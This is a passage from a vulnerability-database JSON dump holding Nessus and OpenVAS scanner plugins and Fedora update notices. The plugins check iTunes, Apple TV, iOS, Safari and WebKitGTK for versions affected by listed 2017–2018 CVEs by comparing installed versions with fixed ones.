get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:00:28", "description": "According to its banner, the version of Apple TV on the remote device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-05T00:00:00", "type": "nessus", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-13833", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876"], "modified": "2019-06-04T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:11", "description": "The version of Apple iOS running on the mobile device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT208334 advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 11.2 Multiple Vulnerabilities (APPLE-SA-2017-12-13-6)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13080", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-13861", "CVE-2017-13860", "CVE-2017-7152", "CVE-2017-13874", "CVE-2017-13833", "CVE-2017-13847", "CVE-2017-7162", "CVE-2017-13879", "CVE-2017-13862", "CVE-2017-13867", "CVE-2017-13876", "CVE-2017-13855", "CVE-2017-13865", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-7154"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700544.PRM", "href": "https://www.tenable.com/plugins/nnm/700544", "sourceData": "Binary data 700544.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-28T21:33:51", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: webkitgtk4-2.18.6-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-01-28T21:33:51", "id": "FEDORA:F117D6006273", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWUXL4ATBJKWKT5ABIGAYICHPARJJPHW/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "WebKitGTK+ is the port of the portable web rendering engine WebKit to the GTK+ platform. This package contains WebKitGTK+ for GTK+ 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-02T16:58:50", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: webkitgtk4-2.18.6-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2018-02-02T16:58:50", "id": "FEDORA:F21276042F34", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWKKPQBMNY3CM2C5DPUKJQX5ITUAD4HC/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3551-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843437", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843437", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3551_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3551-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843437\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 07:54:47 +0100 (Wed, 31 Jan 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2017-7153\", \"CVE-2017-7160\",\n \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2017-13884\", \"CVE-2017-13885\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3551-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in\n the WebKitGTK+ Web and JavaScript engines. If a user were tricked in to opening\n a specially crafted website, an attacker could potentially exploit these to\n cause a denial of service, spoof the user interface, or execute arbitrary code.\n (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161,\n CVE-2017-7165, CVE-2017-13884, CVE-2017-13885)\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3551-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3551-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.6-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.18.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-43712163de", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874088", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_43712163de_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-43712163de\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874088\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-03 07:50:59 +0100 (Sat, 03 Feb 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2017-13885\", \"CVE-2017-7165\",\n \"CVE-2017-13884\", \"CVE-2017-7160\", \"CVE-2017-7153\", \"CVE-2017-7161\",\n \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-43712163de\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-43712163de\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWKKPQBMNY3CM2C5DPUKJQX5ITUAD4HC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2017-13885"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874059", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874059", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_3199135a7e_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874059\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 07:50:21 +0100 (Mon, 29 Jan 2018)\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2017-13885\", \"CVE-2017-7165\",\n \"CVE-2017-13884\", \"CVE-2017-7160\", \"CVE-2017-7153\", \"CVE-2017-7161\",\n \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-3199135a7e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3199135a7e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KWUXL4ATBJKWKT5ABIGAYICHPARJJPHW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.18.6~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:36", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT208475 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812665", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812665", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates( HT208475 )\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812665\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 11:54:25 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple Safari Security Updates( HT208475 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as multiple memory\n corruption issues were addressed with improved memory handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code on\n affected system.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.0.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.0.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208475\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\", \"ssh/login/osx_name\", \"ssh/login/osx_version\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif((!osName && \"Mac OS X\" >!< osName) || !osVer){\n exit (0);\n}\n\nif(version_is_less(version:osVer, test_version:\"10.11.6\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.11.6 and Update Apple Safari to version 11.0.3\" ;\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.12.6 and Update Apple Safari to version 11.0.3\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\nelse if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.2\"))\n{\n fix = \"Upgrade Apple Mac OS X to version 10.13.3 and Update Apple Safari to version 11.0.3\";\n installedVer = \"Apple Mac OS X \" + osVer ;\n}\n\nelse\n{\n if(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\n safVer = infos['version'];\n safPath = infos['location'];\n\n if(version_is_less(version:safVer, test_version:\"11.0.3\"))\n {\n fix = \"11.0.3\";\n installedVer = \"Apple Safari \" + safVer ;\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:installedVer, fixed_version:fix, install_path:safPath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:22:48", "description": "This host is installed with Apple Safari\n and is 